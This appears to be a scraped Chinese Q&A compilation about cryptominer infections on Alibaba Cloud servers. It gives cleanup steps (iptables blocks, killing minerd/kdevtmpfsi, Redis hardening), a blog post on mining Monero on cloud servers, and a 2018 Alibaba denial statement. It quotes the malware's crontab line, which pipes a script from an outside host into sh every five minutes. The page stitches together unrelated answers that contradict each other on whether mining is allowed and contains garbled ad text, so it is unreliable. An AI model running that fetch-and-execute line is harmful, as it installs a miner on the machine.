阿里云阻止挖矿

1. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

2. 阿里云服务器专用网络安全组怎么设置

小鸟云服务器配培升谈备纯SSD架构打造的高性能存储，旨在为用户提供优质、高效、弹性伸缩的云计算服务。
安全策略：设置各种与服务器通过网络通讯的权限和通讯规则的管理。 如：允许或禁止某个IP通过某种协议访问本服务器某个端口（这是由安全策略里的“IP筛选器表”来设定和管理），通讯时是否要验证，通过什么方式和加密手段验证（这些是通过“筛选器操作”来设定和管理）。 打开方式：控制面板 -> 管理工具 -> 本地安全策略 -> IP安全策略 本地计算机 使用举例：让指定IP（IP1)(段)可以访问本机（HOST）上的SQLSERVER（1433端口），其它IP不允许连接。 步骤1：建立两个IP筛选器，一个是从HOST上的1433到IP1上任何端口的（镜像的）筛选器，命名为SQL SERVER ALLOWED IPs；另一个是HOS上的1433到任何IP任何端口的（镜像的）筛选器，命名为SQL SERVER DENIED IPs； 步骤2：建立至少两个筛选操作，一个是“允许”，一个笑洞是“阻止”； *以上两个步骤通过右击空白->管理IP筛选器表和筛选器操作来完成. 步骤3：右击空白->创建IP安全策略：点“添配碰加”来添加两条规则。1）选择筛选器SQL SERVER DENIED IPs，对应选择“阻止”操作； 2）选择筛选器SQL SERVER ALLOWED IPs，对应选择“允许”操作。这样，策略就建好了。 步骤4：右击策略->指派。只有指派了的策略才会生效

3. windows服务器的挖矿进程怎么关闭删除

这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后，使用里面的病毒查杀功能，直接就可以查杀这种电脑病毒了

4. 阿里云windows服务器如何去除挖矿病毒

找到进程，然后找到他文件路径，干掉进程，删掉文件。
另外找找其他可疑进程，避免病毒有守护进程或者其他隐藏进程

5. 清除挖矿病毒kdevtmpfsi

首先确保scrapyd没有对外网0.0.0.0开放
可以检查阿里云安全组
还有scrapyd包所在目录的配置文件
一般在虚拟环境目录/lib/python3.x/site-packages/scrapyd
vim default_scrapyd.conf 第11行，bind_address是否为0.0.0.0

evil为不正常的project

ps -ef | grep kinsing
ps -ef | grep kdevtmpfsi

查看病毒所在位置和pid
rm 删除
kill -9 杀掉
crontab -e 删除不正常的定时任务

ok

6. 防火墙怎么配置防挖矿

针对挖矿蠕虫对SSH/RDP等进行暴力破解的攻击方式，云防火墙的基础防御支持常规的暴力破解检测方式，如登录或试错频次阈值计算，对超过试错阈值的行为进行IP限制，还支持在用户的访问习惯、访问频率基线的基础上，结合行为模型在保证用户正常访问不被拦截的同时对异常登录进行限制。
针对一些通用的漏洞利用方式(如利用Redis写Crontab执行命令、数据库UDF进行命令执行等)，云防火墙的基础防御基于阿里云的大数据优势，利用阿里云安全在云上攻防对抗中积累的大量恶意攻击样本，可以形成精准的防御规则，具有极高的准确性。
若您需要开启云防火墙的基础防御，只需要在安全策略->入侵防御->基础防御配置栏勾选基础规则即可，当基础防御开启后，在网络流量分析->IPS阻断分析中可以看到详细的拦截日志。

7. 云服务器挖矿践行 第一篇

三天以前看到壮乡金荣仔的文章，从中了解到可以利用阿里云服务器进行挖矿，收益可观，于是立即和作者进行了联系，咨询拜师的事情。

通过和孙师傅交流发现，因为写作让我们有了很多共同交流的基础，并且我居然已经关注了孙师傅有好几个月的时间了，这让我们很快建立了信任。

孙师傅在文章中提到正式收徒弟还要等一段时间，我觉得这段时间也不能浪费，还应该为将来拜师以后做一点准备工作。于是我立即开始对云服务挖矿这件事情进行了认真的思考并实践。

云服务挖矿的可行性，大概有这么几个方面。

一，云服务器挖矿的成本收益分析。

成本构成：挖矿的成本主要有三项，矿机的支出，电费，场地及相关管理费用；

收益构成：挖矿的收益主要来自两个方面，一是按照当前数字货币的法币价格可以不管成本而获得的收益，二是数字货币在未来增值获得的收益。

分析：云服务器的运算能力远远低于实体矿机，但是不用支付电费，这是最大的成本节省，另外，由于不需要场地，自己远程管理，场地和管理费用也趋近于零。

因此在算力有限的情况下，云服务器挖矿最大限度地消除了电费和场地的费用，这是这项技术的优势所在。而盈利的平衡点，将极大的取决于服务器费用的支出和当前币价的相对关系。

二，云服务器和挖矿币种的分析。

云服务器的种类有很多，主要分两种，CPU型和GPU型。

目前市场上的各种虚拟币算法也分两类，GPU友好型和CPU有好型。比特币以太坊，莱特币等绝大多数币种都属于GPU友好型，CPU友好型比较少，我了解到的只有大零币zec,小零币xzc,门罗币xmr。

所以这样一来，在服务器和币种的选择问题上，方向很清晰：CPU和GPU任何一个方向，选择算力性价比最高的云服务器和挖矿收益最高的币种。

三，实践。

李笑来的文章中提到过，任何挖矿的行为都不如直接到市场上去买来得容易。我也因此在之前的虚拟货币的学习中，很少关注挖矿的知识。同时对于服务器方面的知识也了解很少，所以一开始我只能用网络上能够搜索得到的办法进行实践， 以快速入门，开始积累。

网上能够直接搜索到的就是利用CPU服务器挖掘门罗币。文章链接如下。

于是我花了391.5元购买了三个月的阿里云轻量型服务器，配置如下。阿里云目前在搞活动，首单可以打七折。

开始进行实践。

经过了两天的折腾，终于在运行服务器上挖矿成功，但是算力只有140h/s，在这个算力下，要亏本一半。

具体折腾的过程中，遇到坑无数，也麻烦了我搞计算机的朋友很多，这个过程留待下一篇再写吧。

四，关于风险的思考。

目前来看，用云服务器挖矿服务器的价格是预付的，并且是固定的，所以挖矿是否有收益，取决于目前的虚拟货币的价格。从孙师傅的截图来看，目前收益还是很可观的。

近期的风险来自于币价的下跌，远期的风险来看，就是阿里云服务器会禁止挖矿行为。阿里云对于挖矿的行为，在网上有过很多的声明。在搜索服务器挖矿相关知识的时候，也发现有国外的服务器禁止挖矿。

长期来看，如果目前云服务器挖矿不赔本那么未来大概率是会有很大的收益的。

就在写这一篇的过程中，孙师傅的收徒标也发出来了，很快就要收徒弟啦。我也正好把这一篇当做我第一这周的作业。

8. 阿里云允许用云主机挖矿吗

VPS提供商一般都不允许云主机进行挖矿，一旦发现就会被封禁，而且本来就对挖矿进行了限制，本身你就无法使用云主机进行挖矿，而且性能也达不到挖矿的标准。

9. 阿里云允许用云主机挖矿吗

是可以的。很多挖矿项目都可以使用云服务器，例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐，然而目前，因为各类硬件采购价格高、到货慢，然而时间不等人！综合对比下来，针对BZZ挖矿，推荐云服务器！
像Swarm BZZ这样的去中心化存储的情况下，以太坊生态中的热点数据每秒都在随时被调用和存储，所以除了CPU、内存和硬盘这三个主要的响应能力之外，还有一个要求宽带传输速度。
使用云服务器来部署bzz节点，核心理由就是一个字“快”，节点早一分钟上线，就能更早的获取到头矿！
经西部数码上千bzz节点部署的实践经验证明，bzz节点需要较高的带宽和超强的磁盘IO性能，以下是结合资源实际消耗情况合理搭配的配置。
4核CPU + 4G内存 + 100G SSD硬盘 + 20M带宽。上述配置，可以部署一个节点。
如果需要部署多节点可以选择多台这样的云服务器，或者选择更高配置的云服务器，如16核CPU + 24G内存 + 500G SSD硬盘 + 200M带宽，可部署5-10个节点。

10. 阿里云深夜发文说什么

阿里云声明：绝不会提 供“挖矿平台”和虚拟货币。

1月17日消息，近日有媒体报道，称阿里巴巴已上线虚拟货币挖矿平台“P2P节点”，指出阿里正在招募矿机入驻。对此，阿里云1月16日深夜发声明辟谣，称该业务与“挖矿平台”、“虚拟货币”等毫无关联。阿里云强调，绝不会发行任何比特币之类的虚拟货币，也不会提供任何所谓的“挖矿平台”。对于虚假报道，将依法追究法律责任。

我们注意到近日有媒体报道称阿里巴巴上线挖矿平台P2P节点。经核实，该业务实际上是阿里云基于P2P技术的CDN（内容分发网络）业务，与“挖矿平台”、“虚拟货币”等毫无关联。

P2P（对等网络）节点是指在CDN行业里常见的用户共享带宽加速服务。由用户通过个人电脑、路由器等设备共享家庭闲置的上行网络带宽，成为一个微型的CDN分发服务节点，使得其他客户在下载、直播、游戏等场景时获得就近加速体验。

对于用户授权共享的资源，阿里云CDN以积分的形式给予奖励，积分可以在积分类商城里置换礼品，不具备货币功能和炒作价值。

我们再次声明，阿里云绝不会发行任何比特币之类的虚拟货币，也不会提供任何所谓的“挖矿平台”。

对于捕风捉影的虚假报道，我们将依法追究法律责任。

阿里云计算有限公司

2018年1月16日